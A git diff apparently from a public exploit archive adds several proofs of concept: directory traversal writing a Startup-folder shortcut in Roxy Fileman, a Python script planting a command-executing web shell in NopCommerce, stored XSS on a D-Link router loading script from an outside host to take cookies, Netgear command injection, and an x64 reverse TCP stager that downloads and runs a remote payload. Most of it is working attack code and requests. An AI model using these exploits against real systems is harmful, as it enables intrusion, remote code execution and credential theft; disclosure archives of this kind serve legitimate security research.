diff --git a/exploits/aspx/webapps/47777.txt b/exploits/aspx/webapps/47777.txt new file mode 100644 index 000000000..3e7d71a37 --- /dev/null +++ b/exploits/aspx/webapps/47777.txt @@ -0,0 +1,125 @@ +# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal +# Author: Patrik Lantz +# Date: 2019-12-06 +# Software: Roxy Fileman +# Version: 1.4.5 +# Vendor Homepage: http://www.roxyfileman.com/ +# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net +# CVE: N/A + +Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 +(using custom account as application pool identity for the IIS worker process). + + +=========================== +Description +=========================== +Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on +the IIS worker process privileges. +This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution +of this file will be triggered on the next login. + + +Proof of Concept +=========================== + +It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action. +The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location. +Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case +allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include +the .lnk extension. + +1) Create a shortcut file + +By using for example the target executable C:\Windows\System32\Calc.exe +Remove the .lnk extension and rename it to use the .dat extension. + + +2) Upload the file + +Either upload the .dat file manually via the Roxy Fileman web interface +or programmatically using a HTTP POST request. + +Details of the request: + +POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1 +Host: 127.0.0.1:50357 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------159382831523528 +Content-Length: 924 +Origin: http://127.0.0.1:50357 +Connection: close +Referer: http://127.0.0.1:50357/wwwroot/fileman/ +Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list + +-----------------------------159382831523528 +Content-Disposition: form-data; name="action" + +upload +-----------------------------159382831523528 +Content-Disposition: form-data; name="method" + +ajax +-----------------------------159382831523528 +Content-Disposition: form-data; name="d" + +/wwwroot/fileman/Uploads/test2 +-----------------------------159382831523528 +Content-Disposition: form-data; name="files[]"; filename="poc.dat" +Content-Type: application/octet-stream + +...data omitted... +-----------------------------159382831523528-- + + + +3) Write the file to the Startup folder using the RENAMEFILE action +The new filename is set via the n parameter. The correct path can be identified by trial and error depending +on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe). + +If the necessary directories do not exist, they can be created using the CREATEDIR action which also +is vulnerable to path traversal. + + +POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1 +Host: 127.0.0.1:50357 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 66 +Origin: http://127.0.0.1:50357 +Connection: close +Referer: http://127.0.0.1:50357/wwwroot/fileman/ +Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list + +f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat + + + +Workaround / Fix: +=========================== + +Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions: +CREATEDIR, COPYFILE and RENAMEFILE. + +Recommendations for users of Roxy Fileman: + - Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default. + + + +Timeline +=========================== +2019-12-06: Discovered the vulnerability +2019-12-06: Reported to the vendor (vendor is unresponsive) +2019-12-11: Request CVE +2019-12-13: Advisory published + +Discovered By: +=========================== +Patrik Lantz \ No newline at end of file diff --git a/exploits/aspx/webapps/47783.py b/exploits/aspx/webapps/47783.py new file mode 100755 index 000000000..a914ab630 --- /dev/null +++ b/exploits/aspx/webapps/47783.py @@ -0,0 +1,79 @@ +# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation +# Author: Alessandro Magnosi (d3adc0de) +# Date: 2019-07-07 +# Vendor Homepage: https://www.nopcommerce.com/ +# Software Link : https://www.nopcommerce.com/ +# Tested Version: 4.2.0 +# Vulnerability Type: Privilege Escalation +# Tested on OS: Windows 10, CentOS, Docker +# Exploit designed for: NopCommerce 4.2.0 on IIS + +import requests +import argparse +from bs4 import BeautifulSoup +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import warnings +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') + +def proxy(flag): + return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None + +def geturl(baseurl, type): + if type == "login": + return baseurl + "/login" + elif type == "mv": + return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2" + elif type == "mkdir": + return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common" + elif type == "put": + return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD" + elif type == "contactus": + return baseurl + "/contactus" + else: + return "" + +def login(email, password, url, proxy): + res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False) + cookie = res.cookies.get_dict() + soup = BeautifulSoup(res.text, features="html.parser") + token = soup.find("input", {"name":"__RequestVerificationToken"})["value"] + res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False) + cookies = res.cookies.get_dict() + return { **cookies, **cookie } + +def shellupload(email, password, url, proxy): + print("[+] Trying uploading shell from") + cookies = login(email, password, url, proxy) + # Rename Common Directory + requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + # Create Common Directory + requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + # Upload File into Common + requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n

@ViewData[\"Title\"].

\r\n

@ViewData[\"Message\"]

\r\n

Output for:> @cmd

\r\n\r\n\r\n
\r\nC#:>@cmd\r\n\t\r\n@result\r\n\t\r\nC#:>\r\n
\r\n\r\n
\r\n\r\n

Enter your command below:

\r\n\r\n \r\n\t\r\n\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + # Test if it is working + res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + soup = BeautifulSoup(res.text, features="html.parser") + test = soup.find("span", {"id" : "cmdResult"}) + if test is None: + print("[-] Maybe the target is not vulnerable, or you need to restart the appliance") + else: + print("[+] Shell uploaded under contact us page") + +def main(): + parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce') + parser.add_argument( + '-e', '--email', required=True, type=str, help='Username') + parser.add_argument( + '-p', '--password', required=True, type=str, help='Password') + parser.add_argument( + '-u', '--url', required=True, type=str, help='Base Url of NopCommerce') + parser.add_argument( + '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)') + + args = parser.parse_args() + + shellupload(args.email, args.password, args.url, proxy(args.proxy)) + +if __name__ == '__main__': + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/47776.txt b/exploits/hardware/webapps/47776.txt new file mode 100644 index 000000000..2e690c58e --- /dev/null +++ b/exploits/hardware/webapps/47776.txt @@ -0,0 +1,37 @@ +# Exploit Title: D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting +# Date: 2019-12-13 +# Exploit Author: Sanyam Chawla +# Vendor Homepage: http://www.dlink.co.in +# Category: Hardware (Wi-fi Router) +# Hardware Link: http://www.dlink.co.in/products/?pid=678 +# Hardware Version: T1 +# Firmware Version: 20.07 +# Tested on: Windows 10 and Kali linux +# CVE: N/A + +Reproduction Steps: +1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1] +2. Go to Maintenance page and click on Admin on the left panel +3. Put blind xss Payload in to the name field “>. This payload saved by the server and its reflected in the user page. +4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker. +5. For HTML injection just put Testing in username field, you will get the username bold in your homepage. + +#Burp Intercept + +POST /form2userconfig.cgi HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) +Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 180 +Origin: http://192.168.0.1 +Connection: close +Referer: http://192.168.0.1/userconfig.htm +Cookie: SessionID= +Upgrade-Insecure-Requests: 1 + +username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht +%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send \ No newline at end of file diff --git a/exploits/hardware/webapps/47778.txt b/exploits/hardware/webapps/47778.txt index 0d8c041c4..062ba05e4 100644 --- a/exploits/hardware/webapps/47778.txt +++ b/exploits/hardware/webapps/47778.txt @@ -7,7 +7,7 @@ # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux -# CVE: N/A +# CVE: CVE-2019-19743 # Reproduction Steps: # Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1] diff --git a/exploits/hardware/webapps/47782.py b/exploits/hardware/webapps/47782.py new file mode 100755 index 000000000..8500b1891 --- /dev/null +++ b/exploits/hardware/webapps/47782.py @@ -0,0 +1,27 @@ +# Exploit Title: Netgear R6400 - Remote Code Execution +# Date: 2019-12-14 +# Exploit Author: Kevin Randall +# CVE: CVE-2016-6277 +# Vendor Homepage: https://www.netgear.com/ +# Category: Hardware +# Version: V1.0.7.2_1.1.93 + +# PoC + +#!/usr/bin/python + +import urllib2 + +IP_ADDR = "192.168.1.1" +PROTOCOL = "http://" +DIRECTORY = "/cgi-bin/;" +CMD = "date" +FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD + +req = urllib2.Request(url = FULL_URL) +response = urllib2.urlopen(req) +commandoutput = response.read() +spl_word = "}" +formattedoutput = commandoutput +result = formattedoutput.rpartition(spl_word)[2] +print result \ No newline at end of file diff --git a/exploits/java/webapps/47781.txt b/exploits/java/webapps/47781.txt new file mode 100644 index 000000000..e6f5e7cff --- /dev/null +++ b/exploits/java/webapps/47781.txt @@ -0,0 +1,32 @@ +# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting +# Date: 2019-12-17 +# Exploit Author: MTK +# Vendor Homepage: https://sweethawk.co/zendesk/survey-app +# Software Link: https://www.zendesk.com/apps/support/survey/ +# Version: Up to v1.6 +# Tested on: Zendesk - Firefox/Windows + +# Software description: +# Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question. +# You can get more granular satisfaction data without compromising the response rate. +# Ask an optional NPS question on the landing page. View reports and drill down into the response +# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in +# your trigger or automation. Customize the landing pages for each of your brands. + +# Technical Details & Impact: +# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server +# for later use. The payload is automatically served to users who browse web pages and executed in +# their context. Thus, the victims do not need to click on a malicious link to run the payload. +# All they have to do is visit a vulnerable web page. + +# POC + +1. Open Support ticket in Zendesk and send XSS payload e.g; + +2. Generate survey request to rate the ticket and payload will execute; + +# Time line +09-19-2019 - Vulnerability discovered +09-20-2019 - Vendor contacted +12-02-2019 - Detailed report shared and full disclosure time line given with no response +12-17-2019 - Full Disclosure \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 25ae9288b..548ae3f49 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42087,4 +42087,9 @@ id,file,description,date,author,type,platform,port 47772,exploits/php/webapps/47772.rb,"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)",2019-12-12,"Onur ER",webapps,php, 47773,exploits/php/webapps/47773.txt,"Bullwark Momentum Series JAWS 1.0 - Directory Traversal",2019-12-12,"numan türle",webapps,php, 47774,exploits/hardware/webapps/47774.txt,"NVMS 1000 - Directory Traversal",2019-12-13,"numan türle",webapps,hardware, +47776,exploits/hardware/webapps/47776.txt,"D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting",2019-12-16,"Sanyam Chawla",webapps,hardware, +47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx, 47778,exploits/hardware/webapps/47778.txt,"D-Link DIR-615 - Privilege Escalation",2019-12-16,"Sanyam Chawla",webapps,hardware, +47781,exploits/java/webapps/47781.txt,"Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting",2019-12-17,MTK,webapps,java, +47782,exploits/hardware/webapps/47782.py,"Netgear R6400 - Remote Code Execution",2019-12-17,"Kevin Randall",webapps,hardware, +47783,exploits/aspx/webapps/47783.py,"NopCommerce 4.2.0 - Privilege Escalation",2019-12-17,"Alessandro Magnosi",webapps,aspx, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 2e5fc06d0..a4628419e 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1009,3 +1009,4 @@ id,file,description,date,author,type,platform 47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux 47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux +47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/47784.txt b/shellcodes/linux_x86-64/47784.txt new file mode 100644 index 000000000..87ce285a2 --- /dev/null +++ b/shellcodes/linux_x86-64/47784.txt @@ -0,0 +1,163 @@ +;# Title: Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) +;# Date: 2019-12-16 +;# Author: Lee Mazzoleni +;# Tested on: Ubuntu 18.04.2 LTS +; reverse tcp stager - download and execute up to 4096 bytes of additional payload - no null bytes in this +; this code is 188 bytes total (less if you delete the exit() syscall at the end) + +global _start + +section .text +_start: + + ;// =================> + ;// HEAP ALLOCATION => + ;// =================> + xor rax, rax + mov al, 6 + mov cl, 2 + imul ax, cx ;// int brk() + xor rdi, rdi + syscall ;// brk() + xor rax, rax + mov al, 2 + mov cl, 6 + imul ax, cx + xor rdi, rdi + mov dil, 128 + imul di, 32 + syscall ;// brk(0x1000) - 4096 bytes + xchg rcx, rax ;// save addr of our allocated memory in rcx + + ;//=======================> + ;// MAP HEAP PERMISSIONS => + ;//=======================> + xor rax, rax + mov al, 9 + xchg rdi, rcx + xor rsi, rsi + mov sil, 128 + imul si, 32 + xor rdx, rdx + mov dl, 0x7 + xor r10, r10 + mov r10b, 0x21 + xor r9, r9 + mov r8, -1 + syscall ;// mmap(addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0) + mov r9, rax ;// save heap address in r9 + + ;// ===================> + ;// SOCKET CONNECTION => + ;// ===================> + xor rax, rax + mov al, 41 ;// int socket() + xor rdi, rdi + inc rdi + inc rdi ;// AF_INET + xor rsi, rsi + inc rsi ;// SOCK_STREAM + xor rdx, rdx + mov dl, 6 ;// IPPROTO_TCP + syscall ;// socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) + push rax + pop rdi ;// save the socket's fd in rdi for connect() to use + + xor rax, rax + push rax + mov dword [rsp-4], 0x2a37a8c0 ;// 192.168.55.42 + mov word [rsp-6], 0xbb01 ;// port 443 in lil' endian + sub rsp, 6 + push word 0x2 + + xor rax, rax + mov al, 42 ;// int connect() + mov rsi, rsp + xor rdx, rdx + mov dl, 16 + syscall ;// connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16) + + ;// ====================================> + ;// READ CODE FROM SOCKET FD INTO HEAP => + ;// ====================================> + mov rsi, r9 ;// heap addr still saved in r9 + xor rdx, rdx + mov dl, 41 ;// CHANGE THIS NUMBER TO SUIT THE SIZE OF YOUR PAYLOAD (41-byte payload used in testing) + xor rax, rax + syscall ;// read(3, heap_addr, SIZE) + + ;// =================> + ;// CLOSE SOCKET FD => + ;// =================> + xor rax, rax + mov al, 3 + syscall ;// close(3) + + jmp r9 ;// jmp to the heap address in r9 and execute the downloaded payload + + ;// =========> + ;// EXIT(0) => this bit is unnecessary if your payload already calls exit() + ;// =========> + xor rax, rax + mov al, 60 + xor rdi, rdi + syscall + + +; ===============> +; ===== Usage ===> +; ===============> +; ========================================================================================= +; this program downloads a secondary payload from a remote host, and executes it. +; in this example, the payload used will be a simple hello-world-like program (hello.asm): +; ========================================================================================= +; global _start +; section .text +; _start: +; mov rax, 1 +; mov rdi, 1 +; mov rsi, 0x0a21216f6c6c6548 ; "Hello!!\n" +; push rsi +; mov rsi, rsp +; mov rdx, 8 +; syscall +; mov rax, 60 +; xor rdi, rdi +; syscall +; ========================================================================================= +; 1.) compile your payload: +; ----------------------------------------------------------------------------------------- +; nasm -f elf64 hello.asm -o hello.o && ld hello.o -o hello && rm hello.o +; ========================================================================================= +; 2.) retrieve the opcodes for the payload: +; ----------------------------------------------------------------------------------------- +; objdump -d hello|grep -v '^$\|start>\|file format\|Disassembly'|cut -d' ' -f2-9|sed -E "s/\ [0-9a-f]{6}://g"|grep -Eo '[a-f0-9]{2}'|tr -d '\n' ; echo +; b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 +; ========================================================================================= +; 3.) count how many bytes are in your payload (41 bytes) and update line 86 to reflect this: +; ----------------------------------------------------------------------------------------- +; echo b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05|grep -Eo '[a-f0-9]{2}'|wc -l +; 41 +; ========================================================================================= +; 4.) decode the bytes into raw form and serve it via netcat listener: +; ----------------------------------------------------------------------------------------- +; echo -n b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 | xxd -r -p > payload +; nc -lvp 443 < payload +; listening on [any] 443 ... +; ========================================================================================= +; 5.) one last step before compiling this stager, add your own IP address to line 69: +; ----------------------------------------------------------------------------------------- +; import struct, socket +; print(hex(struct.unpack('